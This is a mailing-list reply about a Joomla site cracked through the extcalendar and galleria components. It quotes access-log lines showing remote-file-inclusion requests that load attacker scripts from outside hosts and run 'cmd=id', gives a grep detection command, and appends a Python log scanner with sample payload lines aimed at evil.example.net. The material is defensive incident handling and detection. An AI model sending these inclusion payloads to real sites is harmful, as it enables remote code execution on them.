Re: PLUG website down

Author: Alan Dayley
Date:  
To: Main PLUG discussion list
Subject: Re: PLUG website down
JD Austin wrote:
> If you're not on version 1.0.10 upgrade now:
> http://www.joomla.org/content/view/1510/74/
> I wouldn't be surprised if they make major changes in Joomla to stomp
> out this type of thing.
>
> In all cases I've had an issue the database was unaffected, only the files.
> After the initial panic that I might have been rooted I was relieved
> when I found out how they whacked the index.php and configuration.php
> files on a few of my inactive sites.
>
> After you restore the site, remove com_extcalendar and com_galeria if
> they're still installed.
> Check the directory structure to make sure they're gone.
> Also check your temp directory for strangeness, like a '.a' directory.
>
> If you check your logs you'll find stuff like this:
>
>     XXXXX.org/statistics/logs/access_log:64.38.12.106 - - [18/Jul/2006:15:25:24 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://www.podgorz.cc/cc5.php?? HTTP/1.0" 200 17757 "-" "Mozilla/5.0"
>     XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:47:29 -0700] "GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>     XXXXX.com/statistics/logs/access_log:85.104.97.199 - - [18/Jul/2006:09:57:34 -0700] "GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://61.1.197.244/x/tool25.txt?&cmd=id HTTP/1.0" 404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"
>
> I regularly check to see what they're trying to circumvent now by
> grepping for this type of vulnerability in the apache access logs:
> /bin/grep mosConfig_absolute_path=http /home/httpd/vhosts/*/statistics/logs/access_log | mail -s 'hack attempts'
> The location of your apache logs may be different. If you don't have
> root you can download the logs for your domain and grep them locally.
>
> JD


Thanks, JD. Good advice.

I am in contact with Integrum. The site was, in fact, cracked via the
ext_calendar component that I thought I had patched. Integrum caught it
early this morning and took the site off line to thwart the attack. We
are now discussing the means of getting back online without re-instating
the vulnerability.

It will probably be tomorrow before the site is back online simply
because Integrum has been handling issues with it since very early this
morning. They need to leave it for a while.

I thank them for their efforts and support!

I'll be on the phone with them tomorrow morning. I'll keep updating
status here in the list.

Alan
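As an added example (not code from this thread, from Joomla, or from either poster), here is a small Python scanner that does the same job as JD's grep above, but parses each Apache combined-format access log line and percent-decodes the query string, so an encoded payload such as `http%3A%2F%2F...` that a plain grep for `=http` would miss is still caught. It goes a little beyond the grep: besides `mosConfig_absolute_path` it can optionally flag any query parameter whose value is an absolute URL, which is the general remote-file-inclusion pattern. The sample log lines, hosts and IP addresses in `SAMPLE_LOG` are constructed for the example and are not taken from any real site; the function and variable names are this example's own.

```python
import re
from collections import Counter
from urllib.parse import parse_qsl, urlsplit

# Apache combined log format: client IP, identd, user, [timestamp], "request line",
# status, size, "referer", "user agent". An optional "file:" prefix is accepted because
# grep over several vhost logs (as in the thread) prints the log file name in front.
LOG_RE = re.compile(
    r'^(?:\S*/access_log:)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# A parameter value that is itself an absolute URL is the classic remote-file-inclusion marker.
REMOTE_URL_RE = re.compile(r'^(?:https?|ftp)://', re.IGNORECASE)

# Constructed sample lines (RFC 5737 / example.net addresses), modelled on the thread's format.
SAMPLE_LOG = [
    # RFI attempt against a vulnerable component; the 200 means the component answered.
    'www.example.org/statistics/logs/access_log:192.0.2.10 - - [18/Jul/2006:15:25:24 -0700] '
    '"GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http://evil.example.net/cc5.php?? HTTP/1.0" '
    '200 17757 "-" "Mozilla/5.0"',
    # Same technique, second component, with a trailing command parameter; 404 because it is gone.
    '198.51.100.7 - - [18/Jul/2006:09:47:29 -0700] '
    '"GET /components/com_galleria/galleria.html.php?mosConfig_absolute_path=http://203.0.113.5/x/tool25.txt?&cmd=id HTTP/1.0" '
    '404 958 "-" "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0)"',
    # Percent-encoded variant that a plain grep for "mosConfig_absolute_path=http" would miss.
    '198.51.100.7 - - [18/Jul/2006:09:57:34 -0700] '
    '"GET /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=http%3A%2F%2F203.0.113.5%2Fx%2Ftool25.txt%3F&cmd=id HTTP/1.0" '
    '404 958 "-" "Mozilla/4.0"',
    # Ordinary request; must not be flagged (the referer is a URL, but it is not a query parameter).
    '203.0.113.77 - - [18/Jul/2006:10:01:02 -0700] '
    '"GET /index.php?option=com_content&task=view&id=12 HTTP/1.1" '
    '200 4321 "http://www.example.org/" "Mozilla/5.0"',
]


def parse_line(line):
    """Split one combined-format line into its fields; return None if it does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def find_rfi_attempts(lines, watched_params=("mosConfig_absolute_path",)):
    """Return one record per request whose query string carries a remote URL in a watched
    parameter. Pass watched_params=None to check every parameter, not just the Joomla one."""
    hits = []
    for raw in lines:
        rec = parse_line(raw)
        if rec is None:
            continue
        parts = urlsplit(rec["target"])
        # parse_qsl percent-decodes values, which is what defeats the encoded variant.
        for key, value in parse_qsl(parts.query, keep_blank_values=True):
            if watched_params is not None and key not in watched_params:
                continue
            if REMOTE_URL_RE.match(value):
                hits.append({
                    "ip": rec["ip"],
                    "time": rec["ts"],
                    "path": parts.path,
                    "param": key,
                    "remote_host": urlsplit(value).hostname,
                    "status": int(rec["status"]),
                })
                break  # one record per request is enough
    return hits


def summarize(hits):
    """Count attempts per source IP and per payload host for quick triage."""
    by_ip = Counter(h["ip"] for h in hits)
    by_host = Counter(h["remote_host"] for h in hits)
    return dict(by_ip), dict(by_host)


if __name__ == "__main__":
    found = find_rfi_attempts(SAMPLE_LOG)
    for h in found:
        print(f'{h["time"]} {h["ip"]} -> {h["path"]} [{h["param"]}] payload host {h["remote_host"]} status {h["status"]}')
    print(summarize(found))
```

When reading the output, treat the status code the way the thread's own log excerpt suggests: a 200 means the component was present and processed the request, so that site needs the file check JD describes; a 404 means the component was already removed and the request was merely an attempt. Feeding the real logs in is a matter of `find_rfi_attempts(open(path))`, and the summary can replace the `mail -s 'hack attempts'` body in JD's cron job.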
---------------------------------------------------
PLUG-discuss mailing list -
To subscribe, unsubscribe, or to change your mail settings:
http://lists.PLUG.phoenix.az.us/mailman/listinfo/plug-discuss